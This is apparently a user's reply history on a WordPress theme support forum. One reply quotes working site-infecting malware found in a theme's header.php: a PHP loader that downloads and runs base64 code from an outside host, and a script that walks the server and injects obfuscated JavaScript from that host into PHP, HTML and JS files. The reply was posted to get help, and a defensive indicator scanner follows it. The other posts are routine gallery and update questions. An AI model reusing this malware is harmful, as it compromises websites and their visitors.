Forum Replies Created

  • Hello Victoria,
    Thanks, I am working on it. I understand only a little bit of PHP, but no JS, and so I don't understand what it does. Here is some code from it:

    `$c = “base64_decode”;
    $d = “file_get_contents”;
    $b = $c($d(“https://train.developfirstline.com/y.txt”));
    @file_put_contents(“htht”,””.$b);
    include(“htht”);
    unlink(“htht”);
    <script src=’https://train.developfirstline.com/delivery.js?s=5′ type=’text/javascript’></script>`

    The TXT:

    $lastRunLog = "./track.log";
    if (file_exists($lastRunLog)) {
        $lastRun = file_get_contents($lastRunLog);
        if (time() - $lastRun >= 6400) {
        search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".");
    search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
             file_put_contents($lastRunLog, time());
        }
    } else {
    search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".");
    search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
             file_put_contents( $lastRunLog, time());
    }
    
    		 
    function search_file($dir,$file_to_search){
    
    $files = @scandir($dir);
    
    if($files == false) {
    	
    	$dir = substr($dir, 0, -3);
    	if (strpos($dir, '../') !== false) {
    		
    		@search_file( $dir,".");
    		return;
    	}
    	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
    		
    		@search_file( $dir,".");
    		return;
    	}
    }
    
    foreach($files as $key => $value){
    
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    	
        if(!is_dir($path)) {
    		if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {
    
    		make_it($path);
    
        } }else if($value != "." && $value != "..") {
    
            search_file($path, $file_to_search);
    
        }  
     } 
    
    }
    
    function search_file_js($dir,$file_to_search){
    
    $files = @scandir($dir);
    if($files == false) {
    	
    	$dir = substr($dir, 0, -3);
    	if (strpos($dir, '../') !== false) {
    		
    		@search_file_js( $dir,".js");
    		return;
    	}
    	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
    		
    		@search_file_js( $dir,".js");
    		return;
    	}
    }
    
    foreach($files as $key => $value){
    
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    	
        if(!is_dir($path)) {
    		if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {
    
    		make_it_js($path);
    
        } }else if($value != "." && $value != "..") {
    
            search_file_js($path, $file_to_search);
    
        }  
     } 
    
    }
    
    function make_it_js($f){
    			$g = file_get_contents($f);
    			
    										
    
    if (strpos($g, 'hjsawer') !== false) {
    
    } else {
    
    $l2 = base64_decode("RWxlbWVudC5wcm90b3R5cGUuYXBwZW5kQWZ0ZXIgPSBmdW5jdGlvbihlbGVtZW50KSB7ZWxlbWVudC5wYXJlbnROb2RlLmluc2VydEJlZm9yZSh0aGlzLCBlbGVtZW50Lm5leHRTaWJsaW5nKTt9LCBmYWxzZTsoZnVuY3Rpb24oKSB7IHZhciBlbGVtID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudChTdHJpbmcuZnJvbUNoYXJDb2RlKDExNSw5OSwxMTQsMTA1LDExMiwxMTYpKTsgZWxlbS50eXBlID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTYsMTAxLDEyMCwxMTYsNDcsMTA2LDk3LDExOCw5NywxMTUsOTksMTE0LDEwNSwxMTIsMTE2KTsgZWxlbS5zcmMgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwNCwxMTYsMTE2LDExMiwxMTUsNTgsNDcsNDcsMTE2LDExNCw5NywxMDUsMTEwLDQ2LDEwMCwxMDEsMTE4LDEwMSwxMDgsMTExLDExMiwxMDIsMTA1LDExNCwxMTUsMTE2LDEwOCwxMDUsMTEwLDEwMSw0Niw5OSwxMTEsMTA5LDQ3LDEwMCwxMDEsMTA4LDEwNSwxMTgsMTAxLDExNCwxMjEsNDYsMTA2LDExNSw2MywxMTUsNjEsNTEpO2VsZW0uYXBwZW5kQWZ0ZXIoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsOTksMTE0LDEwNSwxMTIsMTE2KSlbMF0pO2VsZW0uYXBwZW5kQWZ0ZXIoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoU3RyaW5nLmZyb21DaGFyQ29kZSgxMDQsMTAxLDk3LDEwMCkpWzBdKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZShTdHJpbmcuZnJvbUNoYXJDb2RlKDEwNCwxMDEsOTcsMTAwKSlbMF0uYXBwZW5kQ2hpbGQoZWxlbSk7fSkoKTs=");
    $g = file_get_contents($f);
    $g = $l2.$g;
    @system('chmod 777 '.$f);
    @file_put_contents($f,$g);
    $g = file_get_contents($f);
    if (strpos($g, 'hjsawer') !== false) {
    
    } 
    }
    
    			
    }
    
    function make_it($f){
    $g = file_get_contents($f);
    if (strpos($g, '69,108,101,109,101,110,116,46,112,114,111,116') !== false) {
    
    } else {
    $l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,50);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
    if (strpos($g, '<head>') !== false) {
    $b = str_replace("<head>","<head>".$l2,$g);
    @system('chmod 777 '.$f);
    @file_put_contents($f,$b);
    }
    if (strpos($g, '</head>') !== false) {
    $b = str_replace("</head>",$l2."</head>",$g);
    @system('chmod 777 '.$f);
    @file_put_contents($f,$b);
    }
    
    			}
    }
    • This reply was modified 4 months ago by  sardinien.

    The virus is in the header.php (/wp-content/themes/enfold), if someone has the same problem.

    The problem is not caused by Enfold. It comes from a rooting attack (“train.developfirstline.com”), maybe via the Duplicator add-on. Only an old server backup incl. DB helps, because I find no information online about the attack and how to resolve the problem.

    Thank you!
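
A defender's check for the indicators visible in the code quoted above, as an added example that is not part of the original posts or of any project named in them. It decodes `String.fromCharCode(...)` runs, which is how the injected snippet hides its script URL, and flags files whose names the injector targets; the function names and the choice of literals are assumptions, and the sample is constructed from the snippet shown in the post.

```python
import os
import re

# Indicators taken from the code quoted in the post above.
DOMAIN = "train.developfirstline.com"
LITERALS = ("Element.prototype.appendAfter", 'include("htht")', DOMAIN)
# The injector only touches file names containing ".ph", ".htm" or ".js".
TARGET_MARKS = (".ph", ".htm", ".js")
CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")

def decode_charcodes(text):
    """Return the plain strings hidden in String.fromCharCode(...) calls."""
    out = []
    for match in CHARCODE_RE.finditer(text):
        codes = [int(n) for n in match.group(1).split(",") if n.strip()]
        out.append("".join(chr(c) for c in codes if c < 0x110000))
    return out

def scan_text(text):
    """Return a sorted list of reasons why this content looks infected."""
    hits = {f"literal: {lit}" for lit in LITERALS if lit in text}
    for decoded in decode_charcodes(text):
        if DOMAIN in decoded:
            hits.add(f"charcode URL: {decoded}")
    return sorted(hits)

def scan_tree(root):
    """Walk root and map each suspicious file path to its findings."""
    report = {}
    for folder, _dirs, names in os.walk(root):
        for name in names:
            if not any(mark in name for mark in TARGET_MARKS):
                continue
            path = os.path.join(folder, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings = scan_text(fh.read())
            except OSError:
                continue  # unreadable file: skip it and keep scanning
            if findings:
                report[path] = findings
    return report

# Constructed sample: the src assignment from the injected snippet in the post.
SAMPLE = ("elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,"
          "97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,"
          "105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,"
          "106,115,63,115,61,50);")
```

Call `scan_tree()` on a copy of the web root; a `track.log` file next to the infected script is a further sign that the quoted code has run, since it records its last run time there.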

    This reply has been marked as private.
    in reply to: Galerie Problem #1163035

    Thank you Ismael, and sorry, I don't remember having EML activated.

    in reply to: Galerie Problem #1162288

    Sounds identical: for me, under “Edit gallery” there is the normal view with all images, which can also be reordered. If you click “Add to gallery”, everything below the heading stays blank: no images, no button, nothing to edit, add, etc.

    in reply to: Galerie Problem #1162272
    This reply has been marked as private.
    in reply to: Galerie Problem #1161832

    Hello Ismael,
    thank you for the request. Enfold is the latest version

    Theme Updates
    No Updates available. You are running the latest version! (4.6.3.1)

    and WordPress is 5.3.

    I am sending you a link to screenshots to demonstrate the problem “I cannot add photos to the gallery”.

    Regards!

    in reply to: Galerie Problem #1161355

    Support?

    in reply to: Editor umgestellt + Update Problem #1118275

    Thanks Victoria, now all is fine!
    Best Regards!

    in reply to: Editor umgestellt + Update Problem #1118131

    Thanks, with the update (simply copied the “enfold” folder via FTP) almost everything works again. One small thing: the “slideshow buttons” were and still are rounded, but the “avia-menu-text” button in the “main-nav” is now SQUARE. I have searched; where do I change that?

    Thank you!
